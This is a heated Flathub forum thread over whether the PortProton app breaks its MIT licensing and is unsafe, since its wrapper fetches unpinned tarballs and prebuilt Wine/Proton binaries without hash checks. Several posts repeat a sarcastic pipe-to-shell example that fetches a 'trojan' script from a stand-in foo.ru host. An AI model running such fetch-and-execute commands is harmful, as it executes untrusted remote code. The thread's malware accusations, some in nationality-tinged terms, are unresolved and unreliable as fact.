License violation and suspicious app on Flathub

[tim77]

App: ru.linux_gaming.PortProton

Where is actual build manifest of this WINE/Proton build? It's proprietary binary downloaded unclear where from and no one even know how it was built. How is this even published under MIT license? It's literally basically:

#!/usr/bin/bash
curl -O https://foo.ru/download_and_run_trojan_on_my_pc.sh | sh

How this even passed the review?

[Boria138]

The sources of the PortProton project can be found safely on Github https://github.com/Castro-Fidel/PortWINE custom versions of Proton and Wine with all patches here https://github.com/Castro-Fidel/wine_builds, so I consider the claim unfounded.

[Boria138]

The portproton file in flathub is not a binary, it's a regular bash script that will soon be in upstream, before accusing people at least bother to study the information.

[tim77]

There even two different mirrors build scripts for Russians speaking and non-russians:

# choose mirror
if [[ -z "$MIRROR" ]] \
&& [[ "$LANGUAGE" == "ru" ]]
then
    echo 'export MIRROR="CDN"' >> "$USER_CONF"
    export MIRROR="CDN"
elif [[ -z "$MIRROR" ]] ; then
    echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
    export MIRROR="GITHUB"
fi

[Boria138]

There even two different mirrors build scripts for Russians speaking and non-russians:

# choose mirror
if [[ -z "$MIRROR" ]] \
&& [[ "$LANGUAGE" == "ru" ]]
then
    echo 'export MIRROR="CDN"' >> "$USER_CONF"
    export MIRROR="CDN"
elif [[ -z "$MIRROR" ]] ; then
    echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
    export MIRROR="GITHUB"
fi

CDN costs money and not small so it is used only by Russian users who have a problem with github, also the mirror can be easily changed, and how in general the topic jumped to CDN

[tim77]

What exactly does this script download and from where and how can we be sure that it is legal and not malicious?

[tim77]

What exactly does this script download and from where and how can we make sure that it is legal (allowed for redistribution) and not malicious.

[Boria138]

What exactly does this script download and from where and how can we make sure that it is legal (allowed for redistribution) and not malicious.

https://github.com/Castro-Fidel/PortWINE/releases https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton everything the same is on cdn.linux-gaming.ru

[Boria138]

If the fact that cdn is only used in a certain country because it is expensive to use cdn worldwide is enough to say that PortProton spreads viruses, then I have nothing to say.

[Boria138]

Absolutely everything that is in PortProton is 100% open except Steam Runtime Sniper, but it is not used in flatpak and in general is taken directly from Steam, so once again I repeat before accusing the project PortProton in something or provide evidence

[tim77]

What exactly does this script download and from where and how can we make sure that it is legal (allowed for redistribution) and not malicious.

https://github.com/Castro-Fidel/PortWINE/releases https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton everything the same is on cdn.linux-gaming.ru

The portproton file in flathub is not a binary

Exactly what i wrote in original post: it's a script which downloads binaries which no one can reproduce and even from different mirrors: https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz The second on one mirror even not on github and downloads from .ru domain.

[tim77]

Absolutely everything that is in PortProton is 100% open

Yeah, except proprietary blobs from your local PC which downloaded by your script published on Flathub.

[Boria138]

https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz

The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

[Boria138]

Absolutely everything that is in PortProton is 100% open

Yeah, except proprietary blobs from your local PC which downloaded by your script published on Flathub.

At least one proprietary component that you can't look into please

[Boria138]

Exactly what i wrote in original post: it's a script which downloads binaries which no one can reproduce and even from different mirrors:

Specifically this script only downloads the master branch from https://github.com/Castro-Fidel/PortWINE, about cdn already for the second time I repeat the separation is done to save money, but at the same time you can change the mirror with one button in the gui, I guess if the purpose was to infect the computer, then on git where you can see everything could not be switched

[Boria138]

Find a piece of code related to changing mirrors and make sure it's not just a stub

[Boria138]

downloads from .ru domain.

I didn't like this part at all, why emphasize that the domain is .ru, although it is not hidden and is written literally in the id PortProton, do you have some kind of personal dislike specifically for Russians?

[tim77]

so once again I repeat before accusing the project PortProton in something or provide evidence

Please tell me on what reality should i provide evidence, not you, as app developer, how your blobs downloaded by script published on Flathub anyone could reproduce? https://reproducible-builds.org/ I asked you second time and you still can't give a clear answer to this question.

And how long ago curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh began to be called open source? And when it became allowed to be published.

[Boria138]

so once again I repeat before accusing the project PortProton in something or provide evidence

Please tell me on what reality should i provide evidence, not you, as app developer, how your blobs downloaded by script published on Flathub anyone could reproduce? https://reproducible-builds.org/ I asked you second time and you still can't give a clear answer to this question.

And how long ago curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh began to be called open source? And when it became allowed to be published.

The Port Proton project is fully open as well as all its scripts custom versions of wine and proton are easily assembled using scripts from the wine_builds repository I don't see any proprietary blobs that you are talking about

[Boria138]

And as for the evidence you claim that PortProton is a proprietary product that should not be in flathub, I prove the opposite using links that will introduce all the sources and buildbot is it not normal for me to demand proof of your words, because at the moment you have not provided sufficient evidence that PortProton is a proprietary product

[Boria138]

In general, I do not see any point in continuing the dialogue without any real evidence of your accusations, as well as with possible bias on your part, I suggest waiting for an authorized person from flathub and only then continue

[tim77]

https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz

The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

1. You pointed in link with precompiled sources, blob. Before you stated many times that there is any proprietary blobs. I already asked you two times how to reproduce this blobs — no answer.

downloads exactly the same file as from the git

2. Should we take your word for it? There are no even any checks in the build process that this downloaded tarball is deterministic. Moreover, in priority, the first attempt is to download from the .ru source and only then from github:

echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
then
    echo -e "\nError.\nTry download scripts from github.com..."
    curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
    [ "$?" != "0" ] && fatal "Critical error during file download!"
fi
echo "Try unpacking scripts..."
tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"

The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history as is the case with github.

[Boria138]

https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz

The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

1. You pointed in link with precompiled sources, blob. Before you stated many times that there is any proprietary blobs. I already asked you two times how to reproduce this blobs — no answer.

downloads exactly the same file as from the git

2. Should we take your word for it? There are no even any checks in the build process that this downloaded tarball is deterministic. Moreover, in priority, the first attempt is to download from the .ru source and only then from github:

echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
  -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
  -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
then
  echo -e "\nError.\nTry download scripts from github.com..."
  curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
  -L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
  -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
  [ "$?" != "0" ] && fatal "Critical error during file download!"
fi
echo "Try unpacking scripts..."
tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"

The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history as is the case with github.

All scripts for building Proton in wine_builds there and links to sources, about git I do not understand, how can you change the master downloaded from git ? Scripts are not downloaded from cdn because they are small, so it is not possible to change anything in the process

[tim77]

This app should be removed from Flathub entirely as soon as possible, this fact alone is enough:

curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"

[Boria138]

This app should be removed from Flathub entirely as soon as possible, this fact alone is enough:

curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
  -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
  -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"

gutlab.eterfund.ru is just gitlab raised by etersoft, nothing can be changed there either

[Boria138]

On the link https://gitlab.eterfund.ru/Castro-Fidel/PortWINE is absolutely the same source code as on github, because it's just a mirror of guthub, just push occurs in two places at once, that's all, again for the reason I have repeatedly voiced github in cis countries works terrible

[Boria138]

I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ?

[tim77]

I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ?

GOTO 10

[Boria138]

I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ?

GOTO 10

How to change the master branch on the git so that it can not be traced in any way ?

[Boria138]

gitlab is just a mirror of github which doesn't even have its own commits, and even if it did, what's the problem to look at the history of changes and check the downloaded files? I understand if gitlab was closed, but no, it's completely open.

[Boria138]

To summarize, wine and proton can be built using scripts from wine_builds and check that those built by you personally and those on cdn are not different, scripts are downloaded directly from github / gitlab where there is a history of commits.

[tim77]

I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ?

GOTO 10

How to change the master branch on the git so that it can not be traced in any way ?

Easy. This is ridiculous to hear such question from person who spreading his malware.tar.gz (without any deterministic checks during build) from their own git forge (gitlab.eterfund.ru) which used in first place. Without any real reason since project builds on Flathub where Github is never been blocked, sanctioned, etc. So stop clowning please.

[Boria138]

I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ?

GOTO 10

How to change the master branch on the git so that it can not be traced in any way ?

Easy. This is ridiculous to hear such question from person who spreading his malware.tar.gz (without any deterministic checks during build) from their own git forge (gitlab.eterfund.ru) which used in first place. Without any real reason since project builds on Flathub where Github is never been blocked, sanctioned, etc. So stop clowning please.

Clowning around here, I repeat once again all commits are open and master does not change in the process of downloading, about flathub is nonsense, what is in flathub is just a script for installing and running PortProton all the main scripts are downloaded from gitlab, so sanctions and failures matter.

[Boria138]

I don't understand what the problem is. To your own gitlab? Then let's say that all gnome and kde projects are proprietary software, they are hosted on their own gitlab, I can point a finger in the sky at any project.

[tim77]

I don't understand what the problem is.

Neither GNOME neither KDE never ever distributed shady foo.tar.gz without at least hashsum check during build. Also never seen any app on Flathub either would spread such hello_world_bash_script_kiddies_malware.sh. This is first one. Especially marked "safe"! And of course you never seen such malware like PortProton in any official repos of mainstream Linux distros since this is not allowed for packaging.

[Boria138]

And of course you never seen such malware like PortProton in any official repos of mainstream Linux distros since this is not allowed for packaging.

https://packages.altlinux.org/en/sisyphus/srpms/portproton/

https://abf.io/import/portproton

[Boria138]

either would spread such hello_world_bash_script_kiddies_malware.sh

bash script portproton is not encrypted in any way, everything that it does is visible in the script all sources of downloading are also known and open all your claims are based only on your assumptions.

[tim77]

And of course you never seen such malware like PortProton in any official repos of mainstream Linux distros since this is not allowed for packaging.

https://packages.altlinux.org/en/sisyphus/srpms/portproton/

https://abf.io/import/portproton

What a point you trying to make by this? :laughing: Alt Linux is a russian distro. You just prove yourself that no distribution other than Alt Linux allows packaging russian_hello_world_malware? Thanks, now everything fits together!

[tim77]

either would spread such hello_world_bash_script_kiddies_malware.sh

bash script portproton is not encrypted in any way, everything that it does is visible in the script all sources of downloading are also known and open all your claims are based only on your assumptions.

GOTO 10

Why you repeating the same thing over and over instead of admitting the mistake and fixing the build? You have already repeatedly said that we should only take your word. We don't even deserve at least a tarball hash check when downloading from a .ru source.

[Boria138]

either would spread such hello_world_bash_script_kiddies_malware.sh

bash script portproton is not encrypted in any way, everything that it does is visible in the script all sources of downloading are also known and open all your claims are based only on your assumptions.

GOTO 10

Why you repeating the same thing over and over instead of admitting the mistake and fixing the build? You have already repeatedly said that we should only take your word. We don't even deserve at least a tarball hash check when downloading from a .ru source.

Why you don't require a check sum from the version downloaded from github, but you don't like gutlab.eterfund.ru ? What are the differences between github and gitlab, and you should believe not my words, but the history of commits, which are the same, you want to download master from github and gitlab hashes will be the same, you want to check each file separately no problem

[tim77]

Why you don't require a check sum from the version downloaded from github

What? Flatpak even not allow build if there is no tarball hashsum check or requires fixed commit version for source. That's why every source tarball have this hashsum check in the the build manifest, e.g. It's already required by design. This is also a requirement for any mainstream Linux distro and never ever allowed for packaging. This also was always a requirement of Flathub for FOSS apps. This only acceptable if app marked as proprietary/non-free software with corresponding unsafe flag. This just proves one more time that instead of just fix your build you still repeat over and over again your bla bla bla. Good luck with that.

[Boria138]

Why you don't require a check sum from the version downloaded from github

What? Flatpak even not allow build if there is no tarball hashsum check or requires fixed commit version for source. That's why every source tarball have this hashsum check in the the build manifest, e.g. It's already required by design. This is also a requirement for any mainstream Linux distro and never ever allowed for packaging. This also was always a requirement of Flathub for FOSS apps. This only acceptable if app marked as proprietary/non-free software with corresponding unsafe flag. This just proves one more time that instead of just fix your build you still repeat over and over again your bla bla bla. Good luck with that.

There are no scripts inside flatpak, there is only a startup script which then downloads scripts when the user launches the application itself, so I am not violating flatpak rules, the script itself lies open inside flathub then moves to upstream with chexums and is still open, where is the proprietary software ? Everything on flathub is a wrapper, the scripts themselves are on git under MIT license.

[Boria138]

Inside flathub there is no assembly at all there is just a wrapper, everything else (desktop and metainfo) is downloaded from upstream by tag and cheksumma, then at startup the scripts are downloaded.

[Boria138]

If wrapper downloaded scripts for example from a closed cdn I would agree that it is proprietary software, but so links nobody hides sources under MIT nothing proprietary, and the claim that the master can change pulled by the ears, indeed the master can be changed, but we do not do it, wrapper links on the fly does not change, with git also no manipulation does not happen, so it is MIT with the license I am not mistaken

[Boria138]

And I anticipate the argument that my words mean nothing and do not prove that the master does not change at download time, here I can not say anything to prove my words, so it may sound really weak, but I really just can not think of a way to prove that the master branch is clean, either on github or on gitlab, but if you know such a way I will be glad to cooperate.

[tim77]

he script itself lies open inside flathub then moves to upstream with chexums and is still open, where is the proprietary software

Sure, who need facts. It’s enough just your words that you repeat a hundred times. GOTO 10

Facts, for the umpteenth time:

• There is no hash sums checks in script which downloading potentially ANY .tar.gz which could be modified in any time on the fly.
• Binary blobs wine/proton and other binary stuff with link provided by you. How to reproduce this builds i've asked you already three times — no answer.
• What is MIT we in the portproton developer's sense we also understand.
• portproton developer's first time have luck with publishing his malware somewhere other than Alt Linux since no one ever never accept such package. And portproton devs even have no intentions to fix this!

Now a question has arisen about Flathub future: everyone can publish such curl -O https://foo.ru/download_and_run_trojan_on_my_pc.sh | sh under "MIT" license? Without any additions labels about safety on Store page? Then it's time to think about whether users can trust Flathub.

[Boria138]

Binary blobs wine/proton and other binary stuff with link provided by you. How to reproduce this builds i've asked you already three times — no answer.

What do you mean there is no answer? I all three times dropped the repository where there are links to all the sources, as well as all the necessary scripts for the build.

[Boria138]

There is no hash sums checks in script which downloading potentially ANY .tar.gz which could be modified in any time on the fly.

The installation script always downloads the most recent commit in the master because that's how versions work, a commit with a version is a new version no releases, it's basically a git package, but it's not because the versions are tested before the commit, I have nothing to check, the master always has a different chexumma, I would then have to update flatpak every script update which is quite time consuming.

[tim77]

Binary blobs wine/proton and other binary stuff with link provided by you. How to reproduce this builds i've asked you already three times — no answer.

What do you mean there is no answer? I all three times dropped the repository where there are links to all the sources, as well as all the necessary scripts for the build.

Exactly, all this three times means that this blobs no one can reproduce since this build non-reproducible (https://reproducible-builds.org/). And they are not even build on Github infra. This is just proprietary blobs attached on Release page. The only way to build project is to run download_and_run_trojan_on_my_pc.sh script which downloads every_time_random_new_thing.tar.gz from gitlab.eterfund.ru (for no reason) without any deterministic checks and without any history of changes. Neither user/packager/flathub_infra couldn't even even notice the change after rebuilding package. This whole point and the problem with portproton.

[Boria138]

Exactly, all this three times means that this blobs no one can reproduce since this build non-reproducible. And they are not even build on Github infra. This is just proprietary blobs attached on Release page

Build scripts here https://github.com/Castro-Fidel/wine_builds clone and build wine everything is reproducible, and don't mix PortProton and wine used in it into one mess, wine builds are not on gitlab.

[Boria138]

gitlab.eterfund.ru (for no reason)

For the thousandth time I explain github in cis countries feels terrible, so in the wrapper that downloads all other scripts when running gitlab in priority, because complaints almost every day that PortProton is not downloaded disappeared only when switching to gitlab.